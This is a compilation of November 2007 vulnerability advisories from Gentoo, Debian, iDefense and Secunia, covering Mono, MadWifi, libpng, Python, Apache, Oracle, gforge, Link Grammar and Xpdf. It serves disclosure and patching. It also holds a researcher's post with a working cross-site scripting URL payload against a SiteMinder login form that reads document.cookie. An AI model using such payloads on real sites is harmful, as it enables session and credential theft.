[ GLSA 200711-10 ] Mono: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mono: Buffer overflow Date: November 07, 2007 Bugs: #197067 ID: 200711-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Mono's BigInteger implementation contains a buffer overflow vulnerability that might lead to the execution of arbitrary code. Background == Mono provides the necessary software to develop and run .NET client and server applications on various platforms. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 dev-lang/mono < 1.2.5.1-r1 >= 1.2.5.1-r1 Description === IOActive discovered an error in the Mono.Math.BigInteger class, in the reduction step of the Montgomery-based Pow methods, that could lead to a buffer overflow. Impact == A remote attacker could exploit this vulnerability by sending specially crafted data to Mono applications using the BigInteger class, which might lead to the execution of arbitrary code with the privileges of the user running the application (possibly root) or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Mono users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/mono-1.2.5.1-r1" References == [ 1 ] CVE-2007-5197 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5197 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHMkNzuhJ+ozIKI5gRArYjAJ9phAJywZIzP4gaojoMXPBM8GAFOwCgnT87 kIV5YdfDuYixkkHSy5ynoIk= =Nk3F -END PGP SIGNATURE-
[ GLSA 200711-09 ] MadWifi: Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: MadWifi: Denial of Service Date: November 07, 2007 Bugs: #195705 ID: 200711-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis MadWifi does not correctly process beacon frames which can lead to a remotely triggered Denial of Service. Background == The MadWifi driver provides support for Atheros based IEEE 802.11 Wireless Lan cards. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-wireless/madwifi-ng < 0.9.3.3 >= 0.9.3.3 Description === Clemens Kolbitsch and Sylvester Keil reported an error when processing beacon frames with an overly large "length" value in the "xrates" element. Impact == A remote attacker could act as an access point and send a specially crafted packet to an Atheros based wireless client, possibly resulting in a Denial of Service (kernel panic). Workaround == There is no known workaround at this time. Resolution == All MadWifi users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-wireless/madwifi-ng-0.9.3.3" References == [ 1 ] CVE-2007-5448 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5448 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHMiNtuhJ+ozIKI5gRAoxqAKCEmLB5pbn+EQSnNvbJAcoMe3XbGwCgoeyZ 9aD3ruieUHJOEeCYrR/ihTs= =7I0H -END PGP SIGNATURE-
iDefense Security Advisory 11.07.07: Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability
iDefense Security Advisory 11.07.07 http://labs.idefense.com/intelligence/vulnerabilities/ Nov 07, 2007 I. BACKGROUND Oracle Database Server is a family of database products that range from personal databases to enterprise solutions. Further information is available at the following URL. http://www.oracle.com/database/index.html II. DESCRIPTION Remote exploitation of a buffer overflow in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure in Oracle Corp.'s Database 10gR2 could allow a user with an authenticated session to execute arbitrary code in the context of the database account. The XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure takes two arguments, OWNER and NAME. The lengths of these arguments are used by an internal function to construct an SQL query without being adequately sanitized. If the combined length of the two fields is too large, a buffer overflow occurs, allowing arbitrary code execution. III. ANALYSIS Exploitation of this vulnerability allows an authenticated remote user to execute code on the underlying system in the context of the database account. Other than access to execute the vulnerable function, this vulnerability does not require any special privileges. From the database user account, an attacker can then access or modify the database and files related to its operation. IV. DETECTION iDefense has confirmed this vulnerability on Oracle Database 10g Release 2 with all Critical Patch Updates as of February 2007. Previous versions are suspected to be vulnerable. V. WORKAROUND iDefense is not aware of any effective workaround for this vulnerability. VI. VENDOR RESPONSE Oracle Corp. has been contacted and stated the following. " Tracking #: 9219583 Description: BUFFER OVERFLOW IN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Status: Issue fixed in main codeline, scheduled for a future CPU " VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4517 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/01/2007 Initial vendor notification 02/01/2007 Initial vendor response 11/07/2007 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[SECURITY] [DSA 1402-1] New gforge packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1402-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp November 07, 2007 http://www.debian.org/security/faq - Package: gforge Vulnerability : insecure temporary files Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-3921 Steve Kemp from the Debian Security Audit project discovered that gforge, a collaborative development tool, used temporary files insecurely which could allow local users to truncate files upon the system with the privileges of the gforge user, or create a denial of service attack. For the stable distribution (etch), this problem has been fixed in version 4.5.14-22etch3. For the old stable distribution (sarge), this problem has been fixed in version 3.1-31sarge4. We recommend that you upgrade your gforge package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4.dsc Size/MD5 checksum: 868 4005b2a103656a62f38e1786a227b1d0 http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1.orig.tar.gz Size/MD5 checksum: 1409879 c723b3a9efc016fd5449c4765d5de29c http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4.diff.gz Size/MD5 checksum: 297962 8fd56957c8fbab462ac619339c2f00d3 Architecture independent packages: http://security.debian.org/pool/updates/main/g/gforge/sourceforge_3.1-31sarge4_all.deb Size/MD5 checksum:55884 f4b7e0aee840e3574a0febf1615070be http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_3.1-31sarge4_all.deb Size/MD5 checksum:70804 967a22a70e3ee974962073ab74cfb980 http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_3.1-31sarge4_all.deb Size/MD5 checksum:61044 7b10ab898c539af9aa118b38fcd77843 http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_3.1-31sarge4_all.deb Size/MD5 checksum:72508 7ad6f5e0672cbb256fd12f270130adc6 http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge4_all.deb Size/MD5 checksum:56432 fc8ee68a79928b0833e2a183228a3493 http://security.debian.org/pool/updates/main/g/gforge/gforge-sourceforge-transition_3.1-31sarge4_all.deb Size/MD5 checksum:59388 d0db9082a30227f4b9b60491d58a8c78 http://security.debian.org/pool/updates/main/g/gforge/gforge-cvs_3.1-31sarge4_all.deb Size/MD5 checksum:99248 6fb788e20a56a3b39688723a1c285680 http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_3.1-31sarge4_all.deb Size/MD5 checksum:59914 79c5932a61e0382017da8e1893307e66 http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_3.1-31sarge4_all.deb Size/MD5 checksum: 148476 e22948a815a5ffa5b4c829b926f04d8c http://security.debian.org/pool/updates/main/g/gforge/gforge-common_3.1-31sarge4_all.deb Size/MD5 checksum:93924 12005d816bb895cb93c3add804d137bf http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_3.1-31sarge4_all.deb Size/MD5 checksum:64834 bea186826f61ae4b1d473d45d2821538 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_3.1-31sarge4_all.deb Size/MD5 checksum:65198 b17e85bb88554d2e083d9dcb799e6da7 http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_3.1-31sarge4_all.deb Size/MD5 checksum: 1108056 f812bd185a9dede06dec099e9abaa335 http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_3.1-31sarge4_all.deb Size/MD5 checksum:58298 c3abd99679008d3919d59e373589d8cd http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_3.1-31sarge4_all.deb Size/MD5 checksum:64732 941c0d9bc65f37e3e8860adf3181a3fc Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch3.dsc Size/MD5 checksum: 950 6099abb16f573f57a3bef4a5fec2df30 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch3.diff.gz Size/MD5 checksum: 196475 94131f4f4040768e173c4568894f052f http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14.orig.tar.gz Size/MD5 checksum
[ GLSA 200711-08 ] libpng: Multiple Denials of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libpng: Multiple Denials of Service Date: November 07, 2007 Bugs: #195261 ID: 200711-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Several vulnerabilities in libpng may allow a remote attacker to crash applications that handle untrusted images. Background == libpng is a free ANSI C library used to process and manipulate PNG images. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 media-libs/libpng < 1.2.21-r3 >= 1.2.21-r3 Description === An off-by-one error when handling ICC profile chunks in the png_set_iCCP() function was discovered (CVE-2007-5266). George Cook and Jeff Phillips reported several errors in pngrtran.c, the use of logical instead of a bitwise functions and incorrect comparisons (CVE-2007-5268). Tavis Ormandy reported out-of-bounds read errors in several PNG chunk handling functions (CVE-2007-5269). Impact == A remote attacker could craft an image that when processed or viewed by an application using libpng would cause the application to terminate abnormally. Workaround == There is no known workaround at this time. Resolution == All libpng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.21-r3" References == [ 1 ] CVE-2007-5266 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5266 [ 2 ] CVE-2007-5268 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5268 [ 3 ] CVE-2007-5269 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5269 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHMhzjuhJ+ozIKI5gRAvvcAJ9POnVZo+5eGaeH6xELJSZhC6eeuwCffECb KS8p+WDYlscGB/Ry4EVHkuc= =nG1m -END PGP SIGNATURE-
[ GLSA 200711-07 ] Python: User-assisted execution of arbitrary code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: User-assisted execution of arbitrary code Date: November 07, 2007 Bugs: #192876 ID: 200711-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflow vulnerabilities have been discovered in Python, possibly resulting in the execution of arbitrary code or a Denial of Service. Background == Python is an interpreted, interactive, object-oriented programming language. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/python < 2.4.4-r6 *>= 2.3.6-r3 >= 2.4.4-r6 Description === Slythers Bro discovered multiple integer overflows in the imageop module, one of them in the tovideo() method, in various locations in files imageop.c, rbgimgmodule.c, and also in other files. Impact == A remote attacker could entice a user to process specially crafted images with an application using the Python imageop module, resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Note that this vulnerability may or may not be exploitable, depending on the application using the module. Workaround == There is no known workaround at this time. Resolution == All Python 2.3.x users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r3" All Python 2.4.x users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r6" References == [ 1 ] CVE-2007-4965 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHMhXduhJ+ozIKI5gRAu7QAJwLWN/dJhfYHj0cd47/vpLD0CmT0wCgiL7v CQwkunJwxuLtxFVunazbM90= =ebkp -END PGP SIGNATURE-
[ GLSA 200711-06 ] Apache: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Apache: Multiple vulnerabilities Date: November 07, 2007 Bugs: #186219 ID: 200711-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Apache, possibly resulting in a Denial of Service or the disclosure of sensitive information. Background == The Apache HTTP server is one of the most popular web servers on the Internet. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-servers/apache < 2.2.6*>= 2.0.59-r5 >= 2.2.6 Description === Multiple cross-site scripting vulnerabilities have been discovered in mod_status and mod_autoindex (CVE-2006-5752, CVE-2007-4465). An error has been discovered in the recall_headers() function in mod_mem_cache (CVE-2007-1862). The mod_cache module does not properly sanitize requests before processing them (CVE-2007-1863). The Prefork module does not properly check PID values before sending signals (CVE-2007-3304). The mod_proxy module does not correctly check headers before processing them (CVE-2007-3847). Impact == A remote attacker could exploit one of these vulnerabilities to inject arbitrary script or HTML content, obtain sensitive information or cause a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Apache users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.0.59-r5" References == [ 1 ] CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 [ 2 ] CVE-2007-1862 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1862 [ 3 ] CVE-2007-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 [ 4 ] CVE-2007-3304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304 [ 5 ] CVE-2007-3847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847 [ 6 ] CVE-2007-4465 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHMhKguhJ+ozIKI5gRAilbAJ4lvKMYl87wxBxHtrvhMz7db3yDEACeNQnV UfU90XjcEHARQCFOy/+MtlY= =ZTI0 -END PGP SIGNATURE-
Secunia Research: Link Grammar "separate_sentence()" Buffer Overflow
== Secunia Research 07/11/2007 - Link Grammar "separate_sentence()" Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Link Grammar 4.1b. NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System access Where: Remote == 3) Vendor's Description of Software "The Link Grammar Parser is a syntactic parser of English, based on link grammar, an original theory of English syntax. Given a sentence, the system assigns to it a syntactic structure, which consists of a set of labeled links connecting pairs of words. The parser also produces a "constituent" representation of a sentence (showing noun phrases, verb phrases, etc.)" Product Link: http://www.link.cs.cmu.edu/link/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Link Grammar, which can be exploited by malicious people to compromise an application using the affected code. The vulnerability is caused due to a boundary error within the "separate_word()" function in tokenize.c when processing overly long words (over 61 bytes). This can be exploited to cause a stack-based buffer overflow via a specially crafted sentence passed to the "separate_sentence()" function. Successful exploitation allows execution of arbitrary code. == 5) Solution Do not parse untrusted text using the affected function. == 6) Time Table 23/10/2007 - Vendor notified. 07/11/2007 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2007-5395 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2007-78/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: AbiWord Link Grammar "separate_sentence()" Buffer Overflow
== Secunia Research 07/11/2007 - AbiWord Link Grammar "separate_sentence()" Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * AbiWord Link Grammar 4.2.4. NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software "The Link Grammar Parser is a syntactic parser of English, based on link grammar, an original theory of English syntax. Given a sentence, the system assigns to it a syntactic structure, which consists of a set of labeled links connecting pairs of words. The parser also produces a "constituent" representation of a sentence (showing noun phrases, verb phrases, etc.)" Product Link: http://www.abisource.com/projects/link-grammar/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in AbiWord Link Grammar, which can be exploited by malicious people to compromise an application using the library. The vulnerability is caused due to a boundary error within the "separate_word()" function in tokenize.c when processing overly long words (over 61 bytes). This can be exploited to cause a stack-based buffer overflow via a specially crafted sentence passed to the "separate_sentence()" function. Successful exploitation allows execution of arbitrary code. == 5) Solution Fixed in the CVS repository. == 6) Time Table 23/10/2007 - Vendor notified. 23/10/2007 - vendor-sec notified. 24/10/2007 - Vendor response. 07/11/2007 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2007-5395 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2007-79/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
SiteMinder Agent: Cross Site Scripting
# Exploit in [XSS]:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]
# Cross Site Scripting (Code):
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
In this way we can inject the alert() code without brackets in the
function resetCredFields().
---
function resetCredFields()
{
if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 4 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 5 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 28 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 1 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 18 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 20 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 22 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
---
Regards,
Giuseppe Gottardi (aka oveRet)
---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: [EMAIL PROTECTED]
Web: http://overet.securitydate.it
Wednesday November 07, 2007.
Secunia Research: Xpdf "Stream.cc" Multiple Vulnerabilities
==
Secunia Research 07/11/2007
- Xpdf "Stream.cc" Multiple Vulnerabilities -
==
Table of Contents
Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10
==
1) Affected Software
* Xpdf 3.02 with xpdf-3.02pl1.patch.
NOTE: Other versions may also be affected.
==
2) Severity
Rating: Highly critical
Impact: System access
Where: Remote
==
3) Vendor's Description of Software
"Xpdf is an open source viewer for Portable Document Format (PDF)
files. (These are also sometimes also called 'Acrobat' files, from the
name of Adobe's PDF software.) The Xpdf project also includes a PDF
text extractor, PDF-to-PostScript converter, and various other
utilities.".
Product Link:
http://www.foolabs.com/xpdf/
==
4) Description of Vulnerabilities
Secunia Research has discovered some vulnerabilities in Xpdf, which can
be exploited by malicious people to compromise a user's system.
1) An array indexing error within the
"DCTStream::readProgressiveDataUnit()" method in xpdf/Stream.cc can be
exploited to corrupt memory via a specially crafted PDF file.
2) An integer overflow error within the "DCTStream::reset()" method in
xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow
via a specially crafted PDF file.
3) A boundary error within the "CCITTFaxStream::lookChar()" method in
xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow
by tricking a user into opening a PDF file containing a specially
crafted "CCITTFaxDecode" filter.
Successful exploitation may allow execution of arbitrary code.
==
5) Solution
Do not open untrusted PDF files.
The vendor is reportedly working on a patch.
==
6) Time Table
17/10/2007 - Vendor notified.
22/10/2007 - vendor-sec notified.
19/10/2007 - Vendor response.
07/11/2007 - Public disclosure.
==
7) Credits
Discovered by Alin Rad Pop, Secunia Research.
==
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned the
following CVE identifiers:
* CVE-2007-4352 ("DCTStream::readProgressiveDataUnit()")
* CVE-2007-5392 ("DCTStream::reset()")
* CVE-2007-5393 ("CCITTFaxStream::lookChar()")
==
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://corporate.secunia.com/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://corporate.secunia.com/secunia_research/33/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/secunia_vacancies/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/secunia_security_advisories/
==
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-88/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
==
